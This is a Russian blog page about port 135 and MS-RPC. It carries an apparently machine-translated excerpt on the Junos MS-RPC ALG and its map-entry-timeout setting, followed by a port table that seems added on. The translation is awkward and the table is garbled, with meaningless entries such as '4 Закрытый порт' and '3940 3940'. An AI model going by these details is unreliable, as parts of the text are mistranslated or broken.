В MS-RPC есть интерфейс удаленной активации удаленного протокола DCOM, называемого ISystemActivator (также известного как IRemoteSCMActivator).Он используется инструментарием управления Windows. Командная строка (WMIC), Internet Information Services (IIS) и многие другие другие приложения, которые широко используются.
MS-RPC ALG вместо этого динамически выделяет новые записи сопоставления. использования размера по умолчанию (512 записей). Он также предлагает гибкую, основанную на времени Запись сопоставления RPC, которая удаляет запись сопоставления (автоматическая очистка) без влияющие на связанные активные сеансы RPC, включая оба контрольных сеанс и сеанс данных.
Запуск в Junos Выпуск ОС 15.1X49-D10 и Junos OS Release 17.3R1, вы можете определить значение срока действия записи сопоставления MS-RPC. Использовать команда set security alg msrpc map-entry-timeout value . Значение срока действия варьируется от 1 часа до 72 часов, а значение по умолчанию составляет 32 часа. Если служба MS-RPC ALG не запускает элемент управления согласование даже после 72 часов, максимальная запись сопоставления MS-RPC ALG значение истекает, и новое подключение данных к службе не удается.
.
No related posts.
0 comments on “135 порт за что отвечает: Основы сетевых портов | Windows IT Pro/RE”
Добавить комментарий Отменить ответ
Ваш адрес email не будет опубликован. Обязательные поля помечены *
Comment *
Name *
Email *
Website

Hit enter to search or ESC to close
Рубрики
Новые
Передатчики
Радиолюбителям
Схемы
Электроника
Разное

2019 © Все права защищены. Карта сайта

Номер порта	Назначение порта
4	Закрытый порт
21	FTP
5
23	telnet
80	HTTP
135	Windows RPC 0
Windows RPC 0
Windows RPC

443	HTTPS
513	rlogin
902	VMware Authentication Daemon
3940	3940
5988	WBEM HTTP
5989	WBEM HTTPS